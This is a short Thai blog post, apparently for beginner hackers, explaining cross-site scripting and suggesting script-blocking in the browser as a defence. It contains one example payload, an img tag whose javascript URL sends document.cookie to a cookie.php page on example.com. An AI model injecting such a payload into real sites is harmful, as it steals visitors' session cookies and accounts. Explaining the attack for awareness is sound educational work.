XSS คืออะไร ? Hacker มือใหม่ควรรู้ไว้

(XSS (cross site scripting) เป็นวิธีการยอดนิยมที่แฮคเกอร์รู้จักกันดี ซี่งเป็นเทคนิคการฝังโค้ดเข้าไปกับหน้าเวปเพจที่มีช่องโหว่ เมื่อผู้ใช้โหลดหน้าเวปเพจไป ค่าที่สำคัญบางอย่าง เช่น ค่าของ cookie, username, password ,... ก็อาจจะถูกขโมยไปได้
มาดูตัวอย่างการฝังโค้ดกันเลยดีกว่าคับ

<img src='javascript:alert("HACKED BY ITU"); document.location = "http://www.example.com/cookie.php?cookie="+document.cookie;' />

จะเห็นได้ว่า เมื่อผู้ใช้โหลดรูปขึ้นมา ก็จะมี alert ขึ้นมาว่า "HACKED BY ITU" ต่อจากนั้นก็จะเปลี่ยนหน้าเวปเพจไปที่ http://www.example.com/cookie.php พร้อมกับ cookie ของคุณ นั้นหมายความว่า คุณได้โดนขโมย cookie ไปแล้วนั่นเอง...

วิธีป้องกันนะคับ อาจจะไม่ได้ผล 100% แต่ก็สามารถช่วยได้ไม่น้อยทีเดียว
นั่นคือการ Disable Scripting Language ที่ Web Browser
ถ้าใครใช้ firefox ก็โหลด Extension ที่มีชือว่า NoScripts มาลองใช้ดูก็ได้คับ

Penulis : THISISABOOKs ~ Sebuah blog yang menyediakan berbagai macam informasi

Artikel XSS คืออะไร ? Hacker มือใหม่ควรรู้ไว้ ini dipublish oleh THISISABOOKs pada hari วันศุกร์ที่ 20 เมษายน พ.ศ. 2555. Semoga artikel ini dapat bermanfaat.Terimakasih atas kunjungan Anda silahkan tinggalkan komentar.sudah ada 1ความคิดเห็น: di postingan XSS คืออะไร ? Hacker มือใหม่ควรรู้ไว้